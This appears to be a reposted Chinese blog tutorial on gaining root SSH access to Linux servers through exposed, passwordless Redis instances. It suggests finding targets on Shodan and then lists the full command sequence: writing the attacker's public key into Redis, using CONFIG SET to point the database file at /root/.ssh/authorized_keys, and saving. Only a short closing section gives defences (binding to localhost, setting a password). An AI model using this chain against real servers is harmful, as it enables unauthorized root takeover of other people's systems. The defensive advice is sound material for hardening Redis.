本文旨在让大家注意加强redis的安全,不要去尝试黑别人
在尝试黑进系统之前,我们先来看一下,通过网络空间的搜索引擎,查看全球内暴露在公网中的6379(Redis默认端口)或27017(默认端口)端口号:
文章插图
文章插图
ZoomEy不行就用:https://www.shodan.io/search?query=6379
下面我就准备两台服务器进行测试:
10.99.73.7(测试机)
10.99.73.11(攻击目标)
1、测试能否连接到远程主机的redis
$ redis-cli -h 10.99.73.11 -p 6379
10.99.73.11:6379> KEYS *
(empty list or set)
能够看到我链接成功,并且能够使用命令进行正常操作;其实只要能到这一步,基本就已经算成功入侵了 。
2、然后将公钥文件内容,写入目标主机的redis
生成自己的公私钥,输入ssh-keygen命令,一路回车
修改id_rsa.pub文件,在文件开头和结尾多添加回次车(最好两次不要多也不要少),必须要加,不然这个公钥过去之后无法使用 。
写公钥进redis
$ cat /root/.ssh/id_rsa.pub | redis-cli -h 10.99.73.11 -p 6379 -x set ssh-key
OK
此时,我们再次连接目标主机的redis查看内容,公钥已经写入了目标主机redis
文章插图
3、将公钥文件写入目标主机上
我们用config命令,分别设置redis写入日志的文件名和目录
10.99.73.11:6379> CONFIG SET dir /root/.ssh
OK
10.99.73.11:6379> CONFIG SET dbfilename "authorized_keys"
OK
10.99.73.11:6379> save
OK
4、验证
使用ssh登录目标主机,此时,已经成功获取linux系统的root账户权限,进入目标主机 。
文章插图
原理
利用redis可以记录日志的能力,将日志写入root用户的.ssh中,从而实现root账户针对攻击者免密登录的权限;
那么有攻击就要有防守,我们应该如何防范这种攻击呢?
方案有两种:
方案1:配置文件中设置允许登录的客户端IP地址:
如: bind 127.0.0.1;
方案2:客户端有密链接服务器 :
如:config set requirepass “password”
【利用Redis黑进目标系统】
推荐阅读
- 黑曜石貔貅风水作用
- 天文学家利用什么推测出了海王星的存在
- 湖南黑茶之茯茶的保存技巧
- 四个步骤 教你辨认黑茶是否发霉
- 黑茶是普洱茶吗?
- 2分钟教你如何突破App分享界限,利用口令闭环玩转裂变
- 湖南黑茶的五大冲泡技巧
- 黑色素|什么精华去痘印效果好
- Redis混合存储产品与架构介绍
- 利用nc命令测试无线路由器的网速